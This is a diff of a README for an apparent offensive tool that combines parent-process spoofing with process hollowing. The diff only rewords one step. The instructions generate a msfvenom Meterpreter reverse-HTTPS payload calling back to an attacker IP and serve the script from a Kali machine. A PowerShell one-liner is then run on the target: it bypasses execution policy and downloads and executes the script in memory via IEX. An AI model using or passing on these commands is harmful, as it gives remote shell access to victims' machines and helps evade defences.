bowtiejicode/Reflective-PPIDxProcHollow/README.md

 1. Generate msfvenom payload
 `msfvenom -p windows/x64/meterpreter/reverse_https LHOST=KALI_IP LPORT=443 EXITFUNC=thread -f ps1`
 2. Search for `Your payload here` in the script and replace it with the generated payload
-3. Host this file on your kali `python3 -m http.server 8088`
+3. Host the script on your kali `python3 -m http.server 8088`
 4. On your target machine `powershell -ep Bypass -c IEX(New-Object System.Net.WebClient).DownloadString('http://KALI_IP:8088/PPIDxProcHollow_v1.1.ps1')`

 ## Disclaimer